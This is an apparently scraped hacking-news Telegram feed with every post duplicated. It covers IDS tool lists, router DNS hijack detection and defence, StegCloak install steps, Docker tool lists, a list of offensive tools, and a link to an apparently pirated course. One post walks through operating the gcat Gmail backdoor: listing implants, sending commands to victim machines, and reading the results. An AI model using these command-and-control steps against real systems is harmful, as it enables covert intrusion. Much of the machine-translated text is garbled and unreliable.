β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Share five free enterprise network intrusion detection (IDS) tools
1οΈβ£Security Onion
Security Onion is an Ubuntu-based Linux distribution for network monitoring and intrusion detection. The image can be distributed as a sensor in the network to monitor multiple VLANs and subnets, which is very suitable for VMware and virtual environments. This configuration can only be used as an IDS and cannot currently be operated as an IPS. However, you can choose to use it as a network and host intrusion detection deployment, and use Squil, Bro IDS, and OSSEC services to perform the IDS function of the service. The tool's wiki information and documentation information is very rich, and vulnerabilities and errors are also recorded and reviewed. Although Security Onion is powerful, it still needs to continue to develop, of course, it takes time.
2οΈβ£OSSEC
OSSEC is an open source host intrusion detection system (HIDS), its function is not just intrusion detection. Like most open source IDS products, there are a variety of additional modules that can combine the core functions of the IDS. In addition to network intrusion detection, the OSSEC client can perform file integrity monitoring and rootkit detection, and has real-time alarms. These functions are all centralized management, and can create different policies according to the needs of enterprises. The OSSEC client runs locally on most operating systems, including Linux versions, Mac OSX, and Windows. It also provides commercial support through Trend Microβs global support team, which is a very mature product.
3οΈβ£OpenWIPS-NG
OpenWIPS-NG is a free wireless IDS/IPS, which relies on servers, sensors and interfaces. It can run on ordinary hardware. Its creator is the developer of Aircrack-NG. The system uses many of Aircrack-NG's built-in functions and services for scanning, detection, and intrusion prevention. OpenWIPS-NG is modular and allows administrators to download plug-ins to add functionality. Its documentation is not as detailed as some systems, but it allows companies to execute WIPS under tight budgets.
4οΈβ£Suricata
Of all the currently available IDS/IPS systems, Suricata is best able to compete with Snort. The system has a Snort-like architecture that relies on signatures like Snort, and can even use the same set of Emerging Threat rules as VRT Snort rules and Snort itself. Suricata is newer than Snort and it will have a chance to overtake Snort. If Snort is not your business choice, this free tool is best for running on your business network.
5οΈβ£Bro IDS
Bro IDS is similar to Security Onion, it uses more IDS rules to determine the source of the attack. Bro IDS uses a combination of tools. It used to convert Snort-based signatures to Bro signatures, but this is no longer the case. Now users can write custom signatures for Bro IDS. The system has a lot of detailed document information and has a history of more than 15 years.
π¦ In most IDS/IPS markets (including free software and open source IDS/IPS), Snort is undoubtedly the most influential tool. The systems described in this undercode tutorial implement IDS/IPS a bit differently, but they are all practical and free tools. Cost-saving companies can use these tools to better protect their networks
Written @UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Share five free enterprise network intrusion detection (IDS) tools
1οΈβ£Security Onion
Security Onion is an Ubuntu-based Linux distribution for network monitoring and intrusion detection. The image can be distributed as a sensor in the network to monitor multiple VLANs and subnets, which is very suitable for VMware and virtual environments. This configuration can only be used as an IDS and cannot currently be operated as an IPS. However, you can choose to use it as a network and host intrusion detection deployment, and use Squil, Bro IDS, and OSSEC services to perform the IDS function of the service. The tool's wiki information and documentation information is very rich, and vulnerabilities and errors are also recorded and reviewed. Although Security Onion is powerful, it still needs to continue to develop, of course, it takes time.
2οΈβ£OSSEC
OSSEC is an open source host intrusion detection system (HIDS), its function is not just intrusion detection. Like most open source IDS products, there are a variety of additional modules that can combine the core functions of the IDS. In addition to network intrusion detection, the OSSEC client can perform file integrity monitoring and rootkit detection, and has real-time alarms. These functions are all centralized management, and can create different policies according to the needs of enterprises. The OSSEC client runs locally on most operating systems, including Linux versions, Mac OSX, and Windows. It also provides commercial support through Trend Microβs global support team, which is a very mature product.
3οΈβ£OpenWIPS-NG
OpenWIPS-NG is a free wireless IDS/IPS, which relies on servers, sensors and interfaces. It can run on ordinary hardware. Its creator is the developer of Aircrack-NG. The system uses many of Aircrack-NG's built-in functions and services for scanning, detection, and intrusion prevention. OpenWIPS-NG is modular and allows administrators to download plug-ins to add functionality. Its documentation is not as detailed as some systems, but it allows companies to execute WIPS under tight budgets.
4οΈβ£Suricata
Of all the currently available IDS/IPS systems, Suricata is best able to compete with Snort. The system has a Snort-like architecture that relies on signatures like Snort, and can even use the same set of Emerging Threat rules as VRT Snort rules and Snort itself. Suricata is newer than Snort and it will have a chance to overtake Snort. If Snort is not your business choice, this free tool is best for running on your business network.
5οΈβ£Bro IDS
Bro IDS is similar to Security Onion, it uses more IDS rules to determine the source of the attack. Bro IDS uses a combination of tools. It used to convert Snort-based signatures to Bro signatures, but this is no longer the case. Now users can write custom signatures for Bro IDS. The system has a lot of detailed document information and has a history of more than 15 years.
π¦ In most IDS/IPS markets (including free software and open source IDS/IPS), Snort is undoubtedly the most influential tool. The systems described in this undercode tutorial implement IDS/IPS a bit differently, but they are all practical and free tools. Cost-saving companies can use these tools to better protect their networks
Written @UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New features of V12 version of the computer file anti-leakage system are as follows:
1οΈβ£The function of automatically isolating unauthorized computers to prevent external computers or mobile devices from accessing the Internet;
2οΈβ£ The function of only allowing intranet whitelist MAC addresses to access each other to prevent external computers from privately accessing intranet computers;
3οΈβ£All online host scans on the LAN Function, and support the function of exporting and importing MAC addresses
4οΈβ£ The administrator can manually set the function that no longer isolates the external computer
5οΈβ£The administrator can add/delete the MAC address of the intranet white list;
6οΈβ£ The administrator can set the permission Unauthorized computer access to intranet
Written @UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦New features of V12 version of the computer file anti-leakage system are as follows:
1οΈβ£The function of automatically isolating unauthorized computers to prevent external computers or mobile devices from accessing the Internet;
2οΈβ£ The function of only allowing intranet whitelist MAC addresses to access each other to prevent external computers from privately accessing intranet computers;
3οΈβ£All online host scans on the LAN Function, and support the function of exporting and importing MAC addresses
4οΈβ£ The administrator can manually set the function that no longer isolates the external computer
5οΈβ£The administrator can add/delete the MAC address of the intranet white list;
6οΈβ£ The administrator can set the permission Unauthorized computer access to intranet
Written @UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ why should hackers suppress router DNS?
1) After the router is controlled, the DNS location of the router can be changed, so that the user's homepage can be controlled, so that he can actively jump and pull out the pop-up window confession and other certain confession fees and traffic fees;
2) After controlling the router, it can monitor the application status of users connected to the wireless network, so as to steal user account information, especially bank account information;
3) The user should take the initiative to jump off the link implanted with the Trojan virus when reading the web page. The user should be recruited to stop the billing or hacking;
π¦How to invent routers in real time can be suppressed?
1) Introspect the DNS location of the router and reflect the location pointed to by the DNS. If the DNS setting in the router's DHCP is 66.102.*.* or 207.254.*.*, it means that it has been suppressed;
2) Reflect the number of access equipment, log in to the router management interface, and reflect on the number of equipment connected to the wireless network. If there is rusty equipment, it may be suppressed;
3) When you read the webpage, it starts to show active jumps, pop-ups and more confession;
4) Introspect whether the manual setting of DNS server option in the high-end settings of router settings can be checked, if it is checked, it has been stated that it has been suppressed;
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ why should hackers suppress router DNS?
1) After the router is controlled, the DNS location of the router can be changed, so that the user's homepage can be controlled, so that he can actively jump and pull out the pop-up window confession and other certain confession fees and traffic fees;
2) After controlling the router, it can monitor the application status of users connected to the wireless network, so as to steal user account information, especially bank account information;
3) The user should take the initiative to jump off the link implanted with the Trojan virus when reading the web page. The user should be recruited to stop the billing or hacking;
π¦How to invent routers in real time can be suppressed?
1) Introspect the DNS location of the router and reflect the location pointed to by the DNS. If the DNS setting in the router's DHCP is 66.102.*.* or 207.254.*.*, it means that it has been suppressed;
2) Reflect the number of access equipment, log in to the router management interface, and reflect on the number of equipment connected to the wireless network. If there is rusty equipment, it may be suppressed;
3) When you read the webpage, it starts to show active jumps, pop-ups and more confession;
4) Introspect whether the manual setting of DNS server option in the high-end settings of router settings can be checked, if it is checked, it has been stated that it has been suppressed;
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to protect against router DNS control?
1) Change the initial password and set the password to be more complicated;
2) Real-time upgrade router firmware patch to repair bare flaws;
3) Initialize the router completely, after clearing the previous settings and equipment, change the password and upgrade the firmware of the router, etc.;
4) Device security software monitors network security
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
1) Change the initial password and set the password to be more complicated;
2) Real-time upgrade router firmware patch to repair bare flaws;
3) Initialize the router completely, after clearing the previous settings and equipment, change the password and upgrade the firmware of the router, etc.;
4) Device security software monitors network security
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 few days- Hide secrets with invisible characters in plain text securely using passwords
π¦ Features :
1)Protect your invisible secret using passwords and HMAC integrity
2)Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
3) Uses 6 Invisible characters in unicode characters that works everywhere in the web.
4) Including the most important ones Tweets, Gmail, Whatsapp, Telegram, Instagram, Facebook etc.
5) Maximum Compression to reduce the payload (LZ, Huffman).
6) Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
7) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
8) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string
9) Written in pure functional style.
>Available as an API module, a CLI and also a Web Interface (optimized with web workers).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/KuroLabs/stegcloak.git
2) $ npm install -g stegcloak
Using npm (to use it locally in your program),
3) $ npm install stegcloak
4) for hide Hide
$ stegcloak hide
5) Reveal
$ stegcloak reveal
π¦API Usage
const StegCloak = require('stegcloak');
const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding
// These arguments are used only during hide
// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 few days- Hide secrets with invisible characters in plain text securely using passwords
π¦ Features :
1)Protect your invisible secret using passwords and HMAC integrity
2)Cryptographically secure by encrypting the invisible secret using AES-256-CTR.
3) Uses 6 Invisible characters in unicode characters that works everywhere in the web.
4) Including the most important ones Tweets, Gmail, Whatsapp, Telegram, Instagram, Facebook etc.
5) Maximum Compression to reduce the payload (LZ, Huffman).
6) Completely invisible, uses Zero Width Characters instead of white spaces or tabs.
7) Super fast! Hides the Wikipedia page-source for steganography (800 lines and 205362 characters) within a covertext of 3 words in under one second.
8) Hiding files in strings can be achieved by uploading the file to cloud and stegcloaking the link in the string
9) Written in pure functional style.
>Available as an API module, a CLI and also a Web Interface (optimized with web workers).
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/KuroLabs/stegcloak.git
2) $ npm install -g stegcloak
Using npm (to use it locally in your program),
3) $ npm install stegcloak
4) for hide Hide
$ stegcloak hide
5) Reveal
$ stegcloak reveal
π¦API Usage
const StegCloak = require('stegcloak');
const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding
// These arguments are used only during hide
// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - KuroLabs/stegcloak: Hide secrets with invisible characters in plain text securely using passwords π§π»ββοΈβ
Hide secrets with invisible characters in plain text securely using passwords π§π»ββοΈβ - GitHub - KuroLabs/stegcloak: Hide secrets with invisible characters in plain text securely using passwords π§π»ββοΈβ
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Monitoring 2020
- [Logspout](https://github.com/gliderlabs/logspout) - Log routing for Docker container logs by [@gliderlabs][gliderlabs]
- [Out-of-the-box Host/Container Monitoring/Logging/Alerting Stack](https://github.com/uschtwill/docker_monitoring_logging_alerting) - Docker host and container monitoring, logging and alerting out of the box using cAdvisor, Prometheus, Grafana for monitoring, Elasticsearch, Kibana and Logstash for logging and elastalert and Alertmanager for alerting. Set up in 5 Minutes. Secure mode for production use with built-in [Automated Nginx Reverse Proxy (jwilder's)][nginxproxy].
- [Zabbix Docker module](https://github.com/monitoringartist/Zabbix-Docker-Monitoring) - Zabbix module that provides discovery of running containers, CPU/memory/blk IO/net container metrics. Systemd Docker and LXC execution driver is also supported. It's a dynamically linked shared object library, so its performance is (~10x) better, than any script solution.
- [Zabbix Docker](https://github.com/gomex/docker-zabbix) - Monitor containers automatically using zabbix LLD feature.
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Monitoring 2020
- [Logspout](https://github.com/gliderlabs/logspout) - Log routing for Docker container logs by [@gliderlabs][gliderlabs]
- [Out-of-the-box Host/Container Monitoring/Logging/Alerting Stack](https://github.com/uschtwill/docker_monitoring_logging_alerting) - Docker host and container monitoring, logging and alerting out of the box using cAdvisor, Prometheus, Grafana for monitoring, Elasticsearch, Kibana and Logstash for logging and elastalert and Alertmanager for alerting. Set up in 5 Minutes. Secure mode for production use with built-in [Automated Nginx Reverse Proxy (jwilder's)][nginxproxy].
- [Zabbix Docker module](https://github.com/monitoringartist/Zabbix-Docker-Monitoring) - Zabbix module that provides discovery of running containers, CPU/memory/blk IO/net container metrics. Systemd Docker and LXC execution driver is also supported. It's a dynamically linked shared object library, so its performance is (~10x) better, than any script solution.
- [Zabbix Docker](https://github.com/gomex/docker-zabbix) - Monitor containers automatically using zabbix LLD feature.
β Git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - gliderlabs/logspout: Log routing for Docker container logs
Log routing for Docker container logs. Contribute to gliderlabs/logspout development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 dockers for #Developers :
- CaptainDuckDuck - Open source Heroku-like platform with a one-liner installer and a GUI for managing apps - with serveral one-click databases and apps.
- Convox Rack - Convox Rack is open source PaaS built on top of expert infrastructure automation and devops best practices.
- Dcw - Docker-compose SSH wrapper: a very poor man PaaS, exposing the docker-compose and custom-container commands defined in container labels.
- Dokkudokku - Docker powered mini-Heroku that helps you build and manage the lifecycle of applications (originally by @progriumprogrium)
- Empire - A PaaS built on top of Amazon EC2 Container Service (ECS)
- Flynn - A next generation open source platform as a service
- OpenShiftopenshift - An open source PaaS built on Kuberneteskubernetes and optimized for Dockerized app development and deployment by Red Hat
- Tsuru - Tsuru is an extensible and open source Platform as a Service software
- Workflow - The open source PaaS for Kubernetes by Deis. Formerly Deis v1.
π¦2020 dockers for #Developers :
- CaptainDuckDuck - Open source Heroku-like platform with a one-liner installer and a GUI for managing apps - with serveral one-click databases and apps.
- Convox Rack - Convox Rack is open source PaaS built on top of expert infrastructure automation and devops best practices.
- Dcw - Docker-compose SSH wrapper: a very poor man PaaS, exposing the docker-compose and custom-container commands defined in container labels.
- Dokkudokku - Docker powered mini-Heroku that helps you build and manage the lifecycle of applications (originally by @progriumprogrium)
- Empire - A PaaS built on top of Amazon EC2 Container Service (ECS)
- Flynn - A next generation open source platform as a service
- OpenShiftopenshift - An open source PaaS built on Kuberneteskubernetes and optimized for Dockerized app development and deployment by Red Hat
- Tsuru - Tsuru is an extensible and open source Platform as a Service software
- Workflow - The open source PaaS for Kubernetes by Deis. Formerly Deis v1.
GitHub
GitHub - caprover/caprover: Scalable PaaS (automated Docker+nginx) - aka Heroku on Steroids
Scalable PaaS (automated Docker+nginx) - aka Heroku on Steroids - caprover/caprover
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Popular 2020 Hacking #Dockers :
- DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
- Andor - Blind SQL Injection Tool With Golang
- SQL Injection Payload List
- WinPwn - Automation For Internal Windows Penetrationtest / AD-Security
- Ddoor - Cross Platform Backdoor Using Dns Txt Records
- Custom Header - Automatic Add New Header To Entire BurpSuite HTTP Requests
- SCShell - Fileless Lateral Movement Tool That Relies On ChangeServiceConfigA To Run Command
- Ultimate Facebook Scraper - A Bot Which Scrapes Almost Everything About A Facebook User'S Profile Including All Public Posts/Statuses Available On The User'S Timeline, Uploaded Photos, Tagged Photos, Videos, Friends List And Their Profile Photos
- FireProx - AWS API Gateway Management Tool For Creating On The Fly HTTP Pass-Through Proxies For Unique IP Rotation
- DNCI - Dot Net Code Injector
- RdpThief - Extracting Clear Text Passwords From Mstsc.Exe Using API Hooking
- Leprechaun - Tool Used To Map Out The Network Data Flow To Help Penetration Testers Identify Potentially Valuable Targets
- Glances - An Eye On Your System. A Top/Htop Alternative For GNU/Linux, BSD, Mac OS And Windows Operating Systems
- Sshtunnel - SSH Tunnels To Remote Server
- RE:TERNAL - Repo Containing Docker-Compose Files And Setup Scripts Without Having To Clone The Individual Reternal Components
- Antispy - A Free But Powerful Anti Virus And Rootkits Toolkit
- Flan - A Pretty Sweet Vulnerability Scanner By CloudFlare
- Corsy - CORS Misconfiguration Scanner
- Kali Linux 2019.4 Release - Penetration Testing and Ethical Hacking Linux Distribution
- XML External Entity (XXE) Injection Payload List
β git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
KitPloit - PenTest & Hacking Tools
DetectionLab - Vagrant And Packer Scripts To Build A Lab Environment Complete With Security Tooling And Logging Best Practices
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Mobile Device Security 2020 RESOURCES FOR BEGINERS :
The following are several of the resources covered in the Art of Hacking Series LiveLessons, Safari Live Training, and penetration testing books authored by Omar Santos.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
theartofhacking.org
The Art of Hacking Video Courses and Live Training - Omar Santos
The Art of Hacking Video Courses and Live Training - A series of video courses, books, and live training by Omar Santos that help you enhance your cybersecurity career. You will learn the key tenets and the fundamentals of ethical hacking and security penetrationβ¦
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Cloud Service blocked a 2.3 Tbps DDoS attack in mid-February :
1οΈβ£Amazon said that its AWS Shield firewall blocked the most intense distributed denial of service (DDoS) attack to date in mid-February this year. The company disclosed in the recently published "AWS Shield Threat Landscape" report. Compared with the peak of 1.7 Tbps recorded in March 2018, the scale of this attack reached a record 2.3 Tbps.
2οΈβ£Although the name of the customer was not mentioned, Amazon revealed that the attack used the hijacked CLDAP web server, and employees of the company's AWS Shield department spent three days responding to the escalation of the threat.
3οΈβ£The good news is that thanks to the joint efforts of Internet Service Providers (ISPs), Content Delivery Networks (CDNs), and other Internet infrastructure companies, the current large-scale DDoS attacks have become quite rare.
4οΈβ£Link 11 pointed out in its first quarter 2020 report that the maximum DDoS attack traffic it mitigated was 406 Gbps. If we take the average, the single DDoS attack in the first quarter of this year is only about 5 Gbps.
5οΈβ£During the same period, the peak of DDoS attacks handled by Cloudflare exceeded 550 Gbps. Akamai announced this morning that the DDoS attack in the first week of June 2020 blocked only 1.44 Tbps of traffic.
6οΈβ£CLDAP is called "connectionless lightweight directory access protocol". As an alternative to the earlier LDAP protocol, it is mainly used to connect, search and modify shared directories on the Internet.
@UndercodeNews
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦A stealthy Python based backdoor that uses Gmail as a command and control server
Termux-Linux
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£ git clone https://github.com/byt3bl33d3r/gcat.git
2οΈβ£cd gcat
3οΈβ£Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
> 964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
4οΈβ£Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
* Command sent successfully with jobid: SH3C4gv
5οΈβ£Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
β git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a C&C server
A PoC backdoor that uses Gmail as a C&C server. Contribute to byt3bl33d3r/gcat development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
#Tips for Text Manipulation
#grep Commands Cheatsheets
- Ryan's Tutorials Cheat Sheet
- DevNotes cheatsheet
#Regex
- grep + regex cheatsheet
- nixCraft Tutorial
#Converters
- BigBash - Open-source converter that generates a bash one-liner from an SQL Select query, no database necessary
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
ryanstutorials.net
Linux Tutorial - Grep Cheat Sheet
A basic Linux grep cheat sheet. Contains links to relevant sections in the tutorial.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Termux tips/commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path
to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
Learn Social Engineering From Scratch
Udemy Link:
https://www.udemy.com/course/learn-social-engineering-from-scratch/
OneDrive Link:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EpnjkaMNMRdJvQQNQOOEt60BMX2XzvhotZ1Uy3ZXPRsteQ?e=PdnUeY
Udemy Link:
https://www.udemy.com/course/learn-social-engineering-from-scratch/
OneDrive Link:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EpnjkaMNMRdJvQQNQOOEt60BMX2XzvhotZ1Uy3ZXPRsteQ?e=PdnUeY
Udemy
Learn Social Engineering From Scratch Course Online
Hack secure accounts and computers (Windows, Apple Mac OS, Linux and Android) and secure yourself from hackers